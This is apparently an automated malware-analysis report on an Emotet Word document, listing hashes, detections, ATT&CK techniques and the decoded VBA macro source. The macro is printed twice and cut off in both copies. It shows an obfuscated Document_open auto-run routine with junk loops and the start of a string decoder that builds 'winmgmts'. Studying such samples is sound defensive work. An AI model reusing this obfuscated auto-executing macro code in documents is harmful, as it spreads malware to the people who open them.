Emotet Office (OLE) malware analysis — malicious · d47e61cfc1103817

MALICIOUS

Office (OLE)

182.1 KB Created: 2019-12-20 17:07:00 Authoring application: Microsoft Office Word First seen: 2020-02-04

MD5: c4cbac036a0f8795920ed0200c4de927 SHA-1: d02d7b6e06c85d35080847acce2d26c6c0fec526 SHA-256: d47e61cfc1103817ee9c1464422ecd7d72cd60493488d5ce14a4e2a499666ae6

202 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is identified as malicious by ClamAV with a specific Emotet signature. Static analysis reveals the presence of VBA macros, including a Document_Open auto-execution macro, which is a common technique for Emotet. The macro's obfuscated nature and truncated script prevent a detailed analysis of its specific actions, but the presence of a Document_Open macro and the Emotet family attribution strongly suggest it's designed to download and execute a secondary payload.

Heuristics 6

ClamAV: Doc.Downloader.Emotet-7473497-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Emotet-7473497-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
GetObject call high OLE_VBA_GETOBJ

GetObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 7618 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	7618 bytes
SHA-256: `4eb0a6204ead2a81b7a349e14398ad82fab5fd22cadc6ae7c7620b352b43e3e0`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "Aojplemq" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Control = "Gzuokbkyuug, 0, 0, MSForms, TextBox" Private Sub Document_open() Ltyncvvwo = 234 + 423 Do While Cikubwvivihv = 1 Hcmhzkjwdl = 3 * Fqdsyasenoww Fnxyeyndusjo = ("Repellendus est quia culpa omnis totam provident quibusdam aut dolorum.") For Jffyugqfec = Cgwsgpnie To Fhbicvkijmfvh Bnbajuowvggcm = ("Rerum ad nihil vel.") Gingzqsy = 223 Next Uuavxkoiio = Elfrlfbvs Loop Ewxdqdei Ewdbqeofwfve = 234 + 423 Do While Ucwjhgwmvyh = 1 Rdkgxjky = 3 * Hscfaewhrzd Ynesxsaetxd = ("Qui facilis cumque porro nam sunt eum sed in dolor.") For Lzxvhrtl = Favhzrpsxom To Trngalouzizs Wrljfjwzrb = ("Velit saepe.") Ndffipzh = 223 Next Ulszawfr = Chtalegcvuz Loop End Sub Attribute VB_Name = "Jeuwzqvsdrcqz" Attribute VB_Base = "0{37180A27-35CF-4DD5-8ADF-8363A452C7B0}{65924915-F776-442B-B179-A71421B8A689}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "Rgzhzedt" Function Ypzdgmswtvdol() Ecpsjpwmt = 234 + 423 Do While Iflpcowzdtqob = 1 Qlrgusoolmu = 3 * Evuphzdzzkfb Mnnnndwy = ("Et.") For Nqguqadhjbui = Gckorame To Bbxyhbyfjab Jiygysjieomg = ("Enim ut vel.") Hhkijhrspcfz = 223 Next Oyzzpjbf = Nlzgxmlswiqx Loop Ccahqiqatqpii = Aojplemq.Gzuokbkyuug Xoxcfslhh = 234 + 423 Do While Pkocrnurft = 1 Kkoupcjxomswo = 3 * Llcoewtryqjb Bqljpnrrywfxb = ("Autem.") For Sroysigd = Cqtqegapan To Nyfcungih Ofyvdbnvnganx = ("Ipsa minima aut odit laborum architecto.") Upfiaghl = 223 Next Tqotxwchqfk = Xomriamlhe Loop Iyufykfdyvmgd = Ccahqiqatqpii + Jeuwzqvsdrcqz.Gshrkbqz + Jeuwzqvsdrcqz.Zomuekcd + Jeuwzqvsdrcqz.Jrgysmbu Zcyuqbzhudyk = 234 + 423 Do While Wvxzhtphlfoe = 1 Ibunrqdbman = 3 * Aoxboyme Vjpfsrtgmsmz = ("In tempora dolor aut amet.") For Kskovjxldp = Ndafwiujyeck To Sublrbvoqv Jeukgzrzeqfgv = ("Ut facilis sint consequatur et et voluptas.") Jkgqadlqc = 223 Next Xmwymfrzzqoo = Skfbpvqn Loop Ztivzgiogphbr = Iyufykfdyvmgd + Jeuwzqvsdrcqz.Yiaxbzchth + Jeuwzqvsdrcqz.Xgxatuyc.Tag Lhsyghafslbi = 234 + 423 Do While Letzvixom = 1 Xdgyuyaelpj = 3 * Hgrkaaarl Gdjeewwuxkid = ("Ea et.") For Xmadmqbyo = Rnomuxlsorr To Aosoiuycxcdnz Uphpromjiicnw = ("Magnam.") Pgxecxxnq = 223 Next Ntkkyuimxzkb = Ofkffhbrs Loop Ypzdgmswtvdol = Mqqyhrxynq + Ztivzgiogphbr + Mqqyhrxynq Yyqtlblmjar = 234 + 423 Do While Usazcqclwva = 1 Bvovtqeuu = 3 * Dwiiuaeoe Iihvwfbbcqq = ("Quaerat id voluptates quis est.") For Pyngajvzaswfh = Wqlyskngoyty To Prmpitwmynup Plpplkfme = ("Dicta.") Pcryihkdhla = 223 Next Zavjsxectfr = Enincmvatq Loop End Function Function Ewxdqdei() Hhahpldlmgytv = 234 + 423 Do While Bdbvsqpntmg = 1 Cpsroosgidlmw = 3 * Nxrrvfnk Iisthuiee = ("Larry") For Ogehjisaqjwkm = Vpltofzmgfamb To Hrygzqmk Ujcwmygukzttl = ("Ronnie") Puyciwrsobfm = 223 Next Gifyxuvw = Gurqiiogepkv Loop iwiwiiwiwjjsj = "__&888&^bBGks^@" Dxztlkebm = 234 + 423 Do While Ngqkvsvdtavag = 1 Mvopoxnzbmda = 3 Vpwvlvkkk Xiaghwsmsyin = ("Sint hic officiis vel.") For Bagoxrskw = Yfumibldur To Ttpkosinbao Evmtdnmdvjry = ("Et.") Wwjcpnmnvh = 223 Next Rojjyrkr = Zjqecjxky Loop Uqdvmpngkfcs = Split("__&888&^bBGks^@wi__&888&^bBGks^@nmg__&888&^b" + "BGks^@mts__&888&^b ... (truncated)

SHA-256: 4eb0a6204ead2a81b7a349e14398ad82fab5fd22cadc6ae7c7620b352b43e3e0

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "Aojplemq"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Gzuokbkyuug, 0, 0, MSForms, TextBox"
Private Sub Document_open()
   Ltyncvvwo = 234 + 423
   Do While Cikubwvivihv = 1
      Hcmhzkjwdl = 3 * Fqdsyasenoww
      Fnxyeyndusjo = ("Repellendus est quia culpa omnis totam provident quibusdam aut dolorum.")
      For Jffyugqfec = Cgwsgpnie To Fhbicvkijmfvh
         Bnbajuowvggcm = ("Rerum ad nihil vel.")
         Gingzqsy = 223
      Next
      Uuavxkoiio = Elfrlfbvs
Loop
Ewxdqdei
   Ewdbqeofwfve = 234 + 423
   Do While Ucwjhgwmvyh = 1
      Rdkgxjky = 3 * Hscfaewhrzd
      Ynesxsaetxd = ("Qui facilis cumque porro nam sunt eum sed in dolor.")
      For Lzxvhrtl = Favhzrpsxom To Trngalouzizs
         Wrljfjwzrb = ("Velit saepe.")
         Ndffipzh = 223
      Next
      Ulszawfr = Chtalegcvuz
Loop
End Sub

Attribute VB_Name = "Jeuwzqvsdrcqz"
Attribute VB_Base = "0{37180A27-35CF-4DD5-8ADF-8363A452C7B0}{65924915-F776-442B-B179-A71421B8A689}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Rgzhzedt"
Function Ypzdgmswtvdol()
   Ecpsjpwmt = 234 + 423
   Do While Iflpcowzdtqob = 1
      Qlrgusoolmu = 3 * Evuphzdzzkfb
      Mnnnndwy = ("Et.")
      For Nqguqadhjbui = Gckorame To Bbxyhbyfjab
         Jiygysjieomg = ("Enim ut vel.")
         Hhkijhrspcfz = 223
      Next
      Oyzzpjbf = Nlzgxmlswiqx
Loop
Ccahqiqatqpii = Aojplemq.Gzuokbkyuug
   Xoxcfslhh = 234 + 423
   Do While Pkocrnurft = 1
      Kkoupcjxomswo = 3 * Llcoewtryqjb
      Bqljpnrrywfxb = ("Autem.")
      For Sroysigd = Cqtqegapan To Nyfcungih
         Ofyvdbnvnganx = ("Ipsa minima aut odit laborum architecto.")
         Upfiaghl = 223
      Next
      Tqotxwchqfk = Xomriamlhe
Loop
Iyufykfdyvmgd = Ccahqiqatqpii + Jeuwzqvsdrcqz.Gshrkbqz + Jeuwzqvsdrcqz.Zomuekcd + Jeuwzqvsdrcqz.Jrgysmbu
   Zcyuqbzhudyk = 234 + 423
   Do While Wvxzhtphlfoe = 1
      Ibunrqdbman = 3 * Aoxboyme
      Vjpfsrtgmsmz = ("In tempora dolor aut amet.")
      For Kskovjxldp = Ndafwiujyeck To Sublrbvoqv
         Jeukgzrzeqfgv = ("Ut facilis sint consequatur et et voluptas.")
         Jkgqadlqc = 223
      Next
      Xmwymfrzzqoo = Skfbpvqn
Loop
Ztivzgiogphbr = Iyufykfdyvmgd + Jeuwzqvsdrcqz.Yiaxbzchth + Jeuwzqvsdrcqz.Xgxatuyc.Tag
   Lhsyghafslbi = 234 + 423
   Do While Letzvixom = 1
      Xdgyuyaelpj = 3 * Hgrkaaarl
      Gdjeewwuxkid = ("Ea et.")
      For Xmadmqbyo = Rnomuxlsorr To Aosoiuycxcdnz
         Uphpromjiicnw = ("Magnam.")
         Pgxecxxnq = 223
      Next
      Ntkkyuimxzkb = Ofkffhbrs
Loop
Ypzdgmswtvdol = Mqqyhrxynq + Ztivzgiogphbr + Mqqyhrxynq
   Yyqtlblmjar = 234 + 423
   Do While Usazcqclwva = 1
      Bvovtqeuu = 3 * Dwiiuaeoe
      Iihvwfbbcqq = ("Quaerat id voluptates quis est.")
      For Pyngajvzaswfh = Wqlyskngoyty To Prmpitwmynup
         Plpplkfme = ("Dicta.")
         Pcryihkdhla = 223
      Next
      Zavjsxectfr = Enincmvatq
Loop
End Function
Function Ewxdqdei()
   Hhahpldlmgytv = 234 + 423
   Do While Bdbvsqpntmg = 1
      Cpsroosgidlmw = 3 * Nxrrvfnk
      Iisthuiee = ("Larry")
      For Ogehjisaqjwkm = Vpltofzmgfamb To Hrygzqmk
         Ujcwmygukzttl = ("Ronnie")
         Puyciwrsobfm = 223
      Next
      Gifyxuvw = Gurqiiogepkv
Loop
iwiwiiwiwjjsj = "__&888*&^bBGks^@"
   Dxztlkebm = 234 + 423
   Do While Ngqkvsvdtavag = 1
      Mvopoxnzbmda = 3 * Vpwvlvkkk
      Xiaghwsmsyin = ("Sint hic officiis vel.")
      For Bagoxrskw = Yfumibldur To Ttpkosinbao
         Evmtdnmdvjry = ("Et.")
         Wwjcpnmnvh = 223
      Next
      Rojjyrkr = Zjqecjxky
Loop
Uqdvmpngkfcs = Split("__&888*&^bBGks^@wi__&888*&^bBGks^@nmg__&888*&^b" + "BGks^@mts__&888*&^b
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.